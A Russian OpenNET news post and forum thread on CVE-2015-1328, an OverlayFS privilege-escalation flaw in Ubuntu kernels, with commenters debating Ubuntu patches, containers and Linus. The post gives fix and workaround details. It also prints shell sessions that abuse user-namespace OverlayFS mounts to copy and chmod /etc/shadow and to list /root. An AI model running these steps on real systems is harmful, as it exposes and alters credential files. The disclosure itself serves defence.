The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Критическая уязвимость в OverlayFS, позволяющая поднять свои..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от opennews (??) on 16-Июн-15, 09:46 
В реализации файловой системы OverlayFS выявлена (http://seclists.org/oss-sec/2015/q2/717) уязвимость (CVE-2015-1328), которую можно использовать для получения root-доступа на системах, в которых разрешено монтирование разделов OverlayFS непривилегированным пользователем. Достаточные для эксплуатации уязвимости настройки по умолчанию применяются во всех поддерживаемых ветках Ubuntu (12.04, 14.04, 14.10 и 15.04).


Разработчики Ubuntu уже оперативно выпустили (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-20...) обновление ядра Linux с исправленным модулем OverlayFS. Подверженность других дистрибутивов данной проблеме пока не подтверждена. В качестве временной меры защиты можно удалить или поместить в чёрный список модуль ядра  overlayfs.ko (или overlay.ko).


Уязвимость вызвана некорректной проверкой прав доступа при создании новых файлов в директории нижележащей  родительской файловой системы. Если ядро собрано с опцией "CONFIG_USER_NS=y" (включение пользовательских пространств имён) и при монтировании использован флаг FS_USERNS_MOUNT, имеется возможность монтирования OverlayFS обычным пользователем в отдельном пространстве имён, в котором в том числе допускаются операции с правами root, распространяющиеся только на данное пространство имён.


Напомним, что пространства имён для идентификаторов пользователей (user namespaces) позволяют сформировать в контейнерах собственные наборы идентификаторов групп и пользователей, а также связанные с ними привилегии (например, в каждом контейнере/пространстве имён может быть свой root). Например, определённый пользователь может получить в контейнере особенные привилегии, которые отсутствуют у него вне контейнера, или процесс внутри контейнера может получить права root, но остаться непривилегированным вне контейнера.


Суть проблемы в том, что привилегированные операции с файлами, выполненные в созданном пространстве имён, при использовании раздела OverlayFS остаются привилегированными и при выполнении действий с нижележащей ФС. Например, можно подключить в OverlayFS системный раздел /etc и модифицировать файл с паролями, посмотреть/заменить содержимое любых закрытых директорий и файлов. Опасность проблемы продемонстрирована готовым эксплоитом (http://seclists.org/oss-sec/2015/q2/att-717/ofs_c.bin), позволяющим запустить shell с правами root через создание доступного на запись файла /etc/ld.so.preload.

Примеры атак.


Создадим полную копию файла /etc/shadow (в примерах под пользователем root подразумевается суперпользователь в пространстве имён, созданном обычным пользователем)


<font color="#461b7e">
   $ ./create-namespace
   # mount -t overlay -o lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
   # chmod 777 work/work/
   # cd o
   # mv shadow copy_of_shadow
   (выход из созданного namespace)

   $ ls -al upper/copy_of_shadow
   -rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
   $ stat upper/copy_of_shadow    /etc/shadow|grep Inode
   Device: 801h/2049d      Inode: 939791      Links: 1
   Device: 801h/2049d      Inode: 277668      Links: 1
</font>

Поменяем права на файл и вернём его в директорию /etc (/etc монтируем как upperdir, а ранее созданную директорию как lowerdir, т.е. меняем upperdir и lowerdir местами):


<font color="#461b7e">
   $ ./create-namespace
   # mount -t overlay -o lowerdir=upper,upperdir=/etc,workdir=work overlayfs o
   # chmod 777 work/work/
   # cd o
   # chmod 777 copy_of_shadow
   ~/o# exit
   ~$ ls -al /etc/copy_of_shadow
-rwxrwxrwx 1 root shadow 1236 May 24 15:51 /etc/copy_of_shadow

</font>

Посмотрим содержимое директории /root:

<font color="#461b7e">
   $ ls -al /root
   ls: cannot open directory /root: Permission denied
   $ mkdir o upper work
   $ mount -t overlayfs -o
lowerdir=/root,upperdir=/home/user/upper,workdir=/home/user/work
overlayfs /home/user/o
   $ ls -al o 2>/dev/null
   total 8
   drwxrwxr-x 1 root nogroup 4096 May 24 16:33 .
   drwxr-xr-x 8 root nogroup 4096 May 24 16:33 ..
   -????????? ? ?    ?          ?            ? .bash_history
   -????????? ? ?    ?          ?            ? .bashrc
   d????????? ? ?    ?          ?            ? .cache
   -????????? ? ?    ?          ?            ? .lesshst
   d????????? ? ?    ?          ?            ? linux-3.19.0

</font>


URL: http://seclists.org/oss-sec/2015/q2/717
Новость: http://www.opennet.dev/opennews/art.shtml?num=42438

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +1 +/
Сообщение от Аноним (??) on 16-Июн-15, 09:46 
Об этом сразу предупреждали, что хлебнут проблем с этими user namespaces и не раз. И вообще контейнеры, в которых используется одно на всех ядро, довольно шаткая конструкция.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 16-Июн-15, 09:51 
Это уже вторая подобная проблема в  user namespaces, первая позволяла полностью контролировать внешнюю ФС через прямое обращение к inode.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

5. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –2 +/
Сообщение от Аноним (??) on 16-Июн-15, 09:57 
> Это уже вторая подобная проблема в  user namespaces, первая позволяла полностью контролировать внешнюю ФС через прямое обращение к inode.

Сдает Линус, сдает. Патчи уже совсем почти не просматривает. В девяносто восьмом такой фигни не было!

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

9. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +6 +/
Сообщение от Какаянахренразница (ok) on 16-Июн-15, 10:10 
> Сдает Линус, сдает.

Акела промахнулся ©

P.S.: Считаешь, что пора?

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

12. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –1 +/
Сообщение от Тимофиев Владимир email on 16-Июн-15, 10:32 
пора переходить на freeBSD
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

23. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 18-Июн-15, 17:03 
> пора переходить на freeBSD

Это которым автоматический троянец сервак расхакал? И над которыми автор очередного сплойта в хидере поздравлял фрибздунов с 20-летием и открыто стебался что "секурность фрибзды - такая же как и 20 лет назад"? Да они даже alsr всякие и прочие W^X сильно опосля большинства пингинов начали задействовать. И вы хотите сказать что они - безопаснее?

Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

15. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +14 +/
Сообщение от anoos on 16-Июн-15, 11:50 
При чем здесь Линус? В ванильном ядре этого нет.
https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linu...
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

17. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Michael Shigorin email(ok) on 16-Июн-15, 14:06 
> https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linu...

Вот так, одной недостаточно обдуманной строчкой...

Ответить | Правка | ^ к родителю #15 | Наверх | Cообщить модератору

19. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +1 +/
Сообщение от grec on 16-Июн-15, 14:33 
Подход debian patch style во всей красе. Вспоминается история про ssh.
Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

21. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Я (??) on 16-Июн-15, 20:53 
>> https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linu...
> Вот так, одной недостаточно обдуманной строчкой...

зачётный пачч :) :) :)

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

26. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +1 +/
Сообщение от Аноним (??) on 18-Июн-15, 19:41 
> Сдает Линус, сдает. Патчи уже совсем почти не просматривает.

Ну еще бы он out of tree художества убунтуев просматривал.

> В девяносто восьмом такой фигни не было!

Хм, действительно. В девяносто восьмом убунты и ее свободных художников с такими креативными патчами на майнлайн еще не существовало.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

4. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –1 +/
Сообщение от Аноним (??) on 16-Июн-15, 09:55 
> Об этом сразу предупреждали, что хлебнут проблем с этими user namespaces и не раз. И вообще контейнеры, в которых используется одно на всех ядро, довольно шаткая конструкция.

OpenVZ тоже когда-то был юным и болел детскими болезнями.
Ничего страшного, рано или поздно допилят и LXC.

А пока проблемы только у пользователей дистрибутивов, в которых по умолчанию включают потенциально опасные фичи. Впрочем, это даже не проблема: расчищать минные поля своими тушками - рядовые будни пользователей таких дистров.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

18. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –1 +/
Сообщение от Michael Shigorin email(ok) on 16-Июн-15, 14:07 
> А пока проблемы только у пользователей убунты

Это часом не User294 был? :)

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

24. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 18-Июн-15, 17:06 
> Это часом не User294 был? :)

Нет. Меня вообще в последнее время на опеннетике маловато. Мне и так есть чем заняться, а писать новости для аудитории которая меня потом называет русофобской мразью, при попустительстве модеров - мне не очень доставляет, если честно. На самом деле вокруг линя и проч - был ряд интересных событий по разным направлениям. Но об этом НеРусофобам как видим придется или почитать на английском или не узнать вообще, как им там больше нравится.

Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

10. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +4 +/
Сообщение от Аноним (??) on 16-Июн-15, 10:17 
Об этом сразу предупреждали, что хлебнут проблем с этими правами доступа, и не раз. И вообще операционные системы, в которых существует более одного пользователя на ядро, довольно шаткая конструкция.
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 16-Июн-15, 09:47 
Docker EPICFAIL!
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 16-Июн-15, 09:59 
> Docker

Скорее LXC. Докер особо и не при делах (это просто юзерспейсный слой абстракции, а проблема в ядре).

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

25. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 18-Июн-15, 19:37 
> Скорее LXC. Докер особо и не при делах (это просто юзерспейсный слой
> абстракции, а проблема в ядре).

Они недавно хвалились переходом на оверлейфс...

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

7. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –2 +/
Сообщение от MPEG LA (ok) on 16-Июн-15, 10:05 
в убунтах по-умолчанию работает?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 16-Июн-15, 10:09 
Первый абзац внимательно прочитал?
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

27. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от MPEG LA (ok) on 19-Июн-15, 12:36 
> Первый абзац внимательно прочитал?

изначально там не было этого текста

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

11. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  –1 +/
Сообщение от Макс (??) on 16-Июн-15, 10:32 
Оперативно выпустили в proposed, где теперь неделю еще лежать будет как минимум?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от anonnon email on 16-Июн-15, 11:00 
У всех уже лежит в Security, а ты особенный.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

22. "Критическая уязвимость в OverlayFS, позволяющая поднять свои..."  +/
Сообщение от Аноним (??) on 16-Июн-15, 21:00 
Действительно обнова оперативная была.
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру